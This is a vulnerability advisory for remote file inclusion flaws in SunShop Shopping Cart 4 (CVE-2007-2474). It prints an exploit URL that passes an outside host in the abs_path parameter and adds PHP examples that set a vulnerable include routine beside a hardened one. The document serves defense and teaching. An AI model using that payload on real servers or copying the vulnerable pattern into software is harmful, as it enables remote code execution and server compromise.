TurnkeyWebTools SunShop Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1112791
Vulnerability type: code injection
Published: 2007-04-25
Updated: 2007-05-03
CVE ID: CVE-2007-2474
CNNVD ID: CNNVD-200705-059
Platform: PHP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/29908
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-059
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in TurnkeyWebTools SunShop Shopping Cart. A remote attacker can execute arbitrary PHP code by supplying a URL in the abs_path parameter of (1) include/payment/payflow_pro.php, (2) global.php, or (3) libsecure.php. This vulnerability is distinct from CVE-2007-2070.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/23662/info

Sunshop is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

These issues affect Sunshop 4; other versions may also be vulnerable.

http://www.example.com/include/payment/payflow_pro.php?abs_path=http://www.example2.com/?
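The advisory above describes the classic PHP remote file inclusion pattern: a request parameter (here abs_path) is concatenated into an include path, so a URL value makes the interpreter fetch and execute remote code. The following is an added illustration, not SunShop's own code; load_config_vulnerable and load_config_hardened are hypothetical names, and the config.php file name is an assumption. It places the vulnerable pattern beside a hardened form and adds a startup check that flags the interpreter setting that makes remote includes possible at all.

```php
<?php
// Added example (not SunShop's code): a hypothetical include routine
// showing how an "abs_path"-style parameter becomes a remote file
// inclusion sink, and how the same routine looks once hardened.

// --- Vulnerable pattern (hypothetical, for illustration only) ---
// abs_path comes straight from the request. With allow_url_include=On,
// a value such as "http://attacker.example/" makes PHP download and run
// whatever that server returns in place of config.php.
function load_config_vulnerable(array $request): void
{
    $abs_path = $request['abs_path'] ?? '.';   // attacker-controlled
    include $abs_path . '/config.php';         // RFI (and LFI) sink
}

// --- Hardened form ---
// 1. The include base is fixed at install time, never taken from the request.
// 2. The final path is canonicalised and verified to stay under APP_ROOT.
// 3. php.ini keeps allow_url_include=Off (and ideally allow_url_fopen=Off).
define('APP_ROOT', realpath(__DIR__));

function load_config_hardened(): void
{
    $candidate = realpath(APP_ROOT . '/config.php');
    $prefix    = APP_ROOT . DIRECTORY_SEPARATOR;

    // realpath() returns false for a missing file; the prefix test rejects
    // anything that resolved (via symlink or "..") outside the app root.
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('refusing to include a file outside the application root');
    }
    include $candidate;
}

// --- Configuration check ---
// Returns true when the interpreter would honour URL include paths.
// Deployments can call this at startup and log or abort accordingly.
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (remote_include_enabled()) {
    error_log('allow_url_include is On: any include() of user-controlled data is a remote code execution path');
}
```

The hardened version removes the request parameter from the include path entirely rather than trying to filter URL schemes out of it, because a path that the application itself knows at install time has no reason to be supplied by the client. The allow_url_include setting (introduced in PHP 5.2.0 and Off by default) is a second, independent layer: with it Off, the vulnerable routine can no longer fetch a remote URL, though it remains a local file inclusion sink, which is why the path fix is still required.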
|References

Source: BID
Name: 23662
Link: http://www.securityfocus.com/bid/23662
Source: BUGTRAQ
Name: 20070425sunshopv4>>RFI
Link: http://www.securityfocus.com/archive/1/archive/1/466850/100/0/threaded